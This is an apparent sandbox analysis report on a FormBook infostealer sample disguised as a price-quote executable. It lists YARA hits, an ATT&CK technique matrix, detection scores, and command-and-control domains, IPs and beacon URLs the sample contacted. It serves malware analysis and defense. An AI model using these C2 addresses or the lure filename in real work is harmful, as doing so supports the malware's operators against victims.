Source: Yara match	File source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	512 Process Injection	1 Rootkit	1 Credential API Hooking	221 Security Software Discovery	Remote Services	1 Credential API Hooking	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	11 Archive Collected Data	Exfiltration Over Bluetooth	4 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	11 Disable or Modify Tools	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	31 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	11 Deobfuscate/Decode Files or Information	Cached Domain Credentials	112 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	3 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	22 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	58%	ReversingLabs	Win32.Packed.Generic
IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	65%	Virustotal		Browse
IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	100%	Avira	HEUR/AGEN.1306870
IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	100%	Avira	HEUR/AGEN.1306870
C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	58%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
www.alivenode.com	0%	Virustotal	Browse
www.bezobotnation.net	0%	Virustotal	Browse
www.75241.shop	2%	Virustotal	Browse
dewdrop.store	0%	Virustotal	Browse
www.transporteturisticofradan.space	0%	Virustotal	Browse
www.theavenuclinic.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.transporteturisticofradan.space	0%	Avira URL Cloud	safe
http://www.skatingisamazing.com/ifrg/www.tasteitmakeit.com	100%	Avira URL Cloud	malware
http://www.75241.shopReferer:	0%	Avira URL Cloud	safe
http://www.zysport.net/ifrg/	100%	Avira URL Cloud	phishing
http://schemas.micro	0%	URL Reputation	safe
http://www.alivenode.comReferer:	0%	Avira URL Cloud	safe
https://www.stacker.com/arizona/phoenix	0%	Avira URL Cloud	safe
https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de	0%	Avira URL Cloud	safe
http://www.transporteturisticofradan.space	0%	Virustotal		Browse
http://www.zysport.net/ifrg/	0%	Virustotal		Browse
http://www.ecodfairs.top/ifrg/	100%	Avira URL Cloud	malware
http://www.ecodfairs.top	0%	Avira URL Cloud	safe
http://www.vespeciative.comReferer:	0%	Avira URL Cloud	safe
http://www.oliverstamatatos.com	0%	Avira URL Cloud	safe
http://www.stakehs.fun/ifrg/www.oliverstamatatos.com	100%	Avira URL Cloud	malware
http://www.oliverstamatatos.com/ifrg/	100%	Avira URL Cloud	malware
http://www.transporteturisticofradan.spaceReferer:	0%	Avira URL Cloud	safe
http://www.ecodfairs.top/ifrg/	0%	Virustotal		Browse
http://www.boat-insurance-today.world/ifrg/www.transporteturisticofradan.space	100%	Avira URL Cloud	malware
http://www.gdminsheng.icu/ifrg/	100%	Avira URL Cloud	malware
http://www.ecodfairs.top	0%	Virustotal		Browse
http://www.stakehs.funReferer:	0%	Avira URL Cloud	safe
http://www.alivenode.com/ifrg/www.75241.shop	100%	Avira URL Cloud	malware
http://www.mndhhy.store	0%	Avira URL Cloud	safe
http://www.gdminsheng.icuReferer:	0%	Avira URL Cloud	safe
http://www.ecodfairs.topReferer:	0%	Avira URL Cloud	safe
http://www.boat-insurance-today.world/ifrg/?MZTt=ah9Zs86GdfepTqxOruRY6KJXUwZDi9MhDmG697S0SgB6n7piKWqUPBRkmR/995/dCXxf&jlUpT=PtkH4NF	100%	Avira URL Cloud	malware
http://www.tasteitmakeit.com/ifrg/www.mndhhy.store	100%	Avira URL Cloud	malware
http://www.mndhhy.store/ifrg/www.stakehs.fun	100%	Avira URL Cloud	malware
http://www.tasteitmakeit.comReferer:	0%	Avira URL Cloud	safe
http://www.theavenuclinic.com	0%	Avira URL Cloud	safe
http://www.dewdrop.store/ifrg/www.vespeciative.com	100%	Avira URL Cloud	malware
http://www.vespeciative.com/ifrg/www.skatingisamazing.com	100%	Avira URL Cloud	malware
http://www.mndhhy.store	0%	Virustotal		Browse
http://www.alivenode.com/ifrg/?MZTt=HEDFe4jCYP8fdlnBQrB26YFMQNXoDtPzhFN7vn7A5A9B7sJohM6u4gXFruHbVPL0Cb9Z&jlUpT=PtkH4NF	100%	Avira URL Cloud	malware
http://www.gdminsheng.icu	0%	Avira URL Cloud	safe
http://www.mndhhy.store/ifrg/	100%	Avira URL Cloud	malware
http://schemas.micros	0%	Avira URL Cloud	safe
http://www.gdminsheng.icu/ifrg/?MZTt=5jR7lvWWhXckZO8bi4azApxiCxIqQi0sZy8hVgUcz7H/XBNAH/0FPTwnmComPhSN5IMV&jlUpT=PtkH4NF	100%	Avira URL Cloud	malware
http://www.tasteitmakeit.com/ifrg/	100%	Avira URL Cloud	malware
http://www.theavenuclinic.com	0%	Virustotal		Browse
http://127.0.0.1:	0%	Avira URL Cloud	safe
http://www.bezobotnation.netReferer:	0%	Avira URL Cloud	safe
http://www.alivenode.com/ifrg/	100%	Avira URL Cloud	malware
http://www.mndhhy.store/ifrg/	0%	Virustotal		Browse
http://www.bezobotnation.net/ifrg/	100%	Avira URL Cloud	malware
http://www.dewdrop.store/ifrg/	100%	Avira URL Cloud	malware
http://www.alivenode.com	0%	Avira URL Cloud	safe
http://www.boat-insurance-today.worldReferer:	0%	Avira URL Cloud	safe
http://www.transporteturisticofradan.space/ifrg/	0%	Avira URL Cloud	safe
http://www.bezobotnation.net/ifrg/	0%	Virustotal		Browse
http://www.tasteitmakeit.com	0%	Avira URL Cloud	safe
http://www.mndhhy.storeReferer:	0%	Avira URL Cloud	safe
http://www.dewdrop.store/ifrg/	1%	Virustotal		Browse
http://www.alivenode.com	0%	Virustotal		Browse
http://www.vespeciative.com/ifrg/?MZTt=D0BUyIgnkwa8kGN9Qj6aSRghucWXbLaIManVicGkKBrvZQsQ3EBcb5KKQY7GQNLPjnt4&jlUpT=PtkH4NF	100%	Avira URL Cloud	malware
http://www.theavenuclinic.com/ifrg/www.ecodfairs.top	100%	Avira URL Cloud	malware
http://www.boat-insurance-today.world	0%	Avira URL Cloud	safe
http://www.theavenuclinic.com/ifrg/	100%	Avira URL Cloud	malware
http://www.zysport.net	0%	Avira URL Cloud	safe
http://www.dewdrop.storeReferer:	0%	Avira URL Cloud	safe
http://www.oliverstamatatos.comReferer:	0%	Avira URL Cloud	safe
http://www.75241.shop/ifrg/	100%	Avira URL Cloud	malware
http://www.theavenuclinic.comReferer:	0%	Avira URL Cloud	safe
http://www.ecodfairs.top/ifrg/www.bezobotnation.net	100%	Avira URL Cloud	malware
http://www.75241.shop	100%	Avira URL Cloud	phishing
http://www.zysport.netReferer:	0%	Avira URL Cloud	safe
http://www.gdminsheng.icu/ifrg/www.dewdrop.store	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.alivenode.com	38.6.237.43	true	true	0%, Virustotal, Browse	unknown
www.bezobotnation.net	198.54.117.242	true	true	0%, Virustotal, Browse	unknown
www.75241.shop	66.203.148.230	true	true	2%, Virustotal, Browse	unknown
transporteturisticofradan.space	108.179.194.28	true	true		unknown
256.93cu.com	154.12.93.8	true	true		unknown
vespeciative.com	212.129.41.217	true	true		unknown
theavenuclinic.com	3.33.130.190	true	true		unknown
dewdrop.store	3.33.130.190	true	true	0%, Virustotal, Browse	unknown
ssl1.prod.systemdragon.com	104.17.157.1	true	true		unknown
www.dewdrop.store	unknown	unknown	true		unknown
www.vespeciative.com	unknown	unknown	true		unknown
www.boat-insurance-today.world	unknown	unknown	true		unknown
www.transporteturisticofradan.space	unknown	unknown	true	0%, Virustotal, Browse	unknown
www.gdminsheng.icu	unknown	unknown	true		unknown
www.theavenuclinic.com	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.boat-insurance-today.world/ifrg/?MZTt=ah9Zs86GdfepTqxOruRY6KJXUwZDi9MhDmG697S0SgB6n7piKWqUPBRkmR/995/dCXxf&jlUpT=PtkH4NF	true	Avira URL Cloud: malware	unknown
http://www.alivenode.com/ifrg/?MZTt=HEDFe4jCYP8fdlnBQrB26YFMQNXoDtPzhFN7vn7A5A9B7sJohM6u4gXFruHbVPL0Cb9Z&jlUpT=PtkH4NF	true	Avira URL Cloud: malware	unknown
http://www.gdminsheng.icu/ifrg/?MZTt=5jR7lvWWhXckZO8bi4azApxiCxIqQi0sZy8hVgUcz7H/XBNAH/0FPTwnmComPhSN5IMV&jlUpT=PtkH4NF	true	Avira URL Cloud: malware	unknown
http://www.vespeciative.com/ifrg/?MZTt=D0BUyIgnkwa8kGN9Qj6aSRghucWXbLaIManVicGkKBrvZQsQ3EBcb5KKQY7GQNLPjnt4&jlUpT=PtkH4NF	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.transporteturisticofradan.space	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.skatingisamazing.com/ifrg/www.tasteitmakeit.com	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/bat	explorer.exe, 00000010.00000003.3081621435.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291407142.000000000899E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.75241.shopReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.stacker.com/arizona/phoenix	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000010.00000003.3080938875.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1535149000.0000000002F10000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.zysport.net/ifrg/	explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.alivenode.comReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ecodfairs.top	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.ecodfairs.top/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(	explorer.exe, 00000010.00000003.3083803433.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2292272556.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BD22000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.vespeciative.comReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oliverstamatatos.com	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oliverstamatatos.com/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.stakehs.fun/ifrg/www.oliverstamatatos.com	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.transporteturisticofradan.spaceReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.boat-insurance-today.world/ifrg/www.transporteturisticofradan.space	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.gdminsheng.icu/ifrg/	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.stakehs.funReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.alivenode.com/ifrg/www.75241.shop	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mndhhy.store	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.gdminsheng.icuReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOSp	explorer.exe, 00000010.00000003.2292272556.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3907642748.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1542765374.000000000BDFF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3083159268.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2293797642.000000000BDFE000.00000004.00000001.00020000.00000000.sdmp	false		high
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.ecodfairs.topReferer:	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/rT	explorer.exe, 00000010.00000003.3081820013.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008796000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.tasteitmakeit.com/ifrg/www.mndhhy.store	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, 00000001.00000002.1497547204.0000000002C7A000.00000004.00000800.00020000.00000000.sdmp, ySqETqNvdTbE.exe, 0000000B.00000002.1554658117.0000000002DAA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.mndhhy.store/ifrg/www.stakehs.fun	explorer.exe, 00000010.00000003.2294418466.000000000C27C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290941874.000000000C228000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2290780097.000000000C1FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3909569539.000000000C22B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 00000010.00000000.1535947751.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3082296538.0000000007058000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3895814039.0000000007058000.00000004.00000001.00020000.00000000.sdmp	false		high
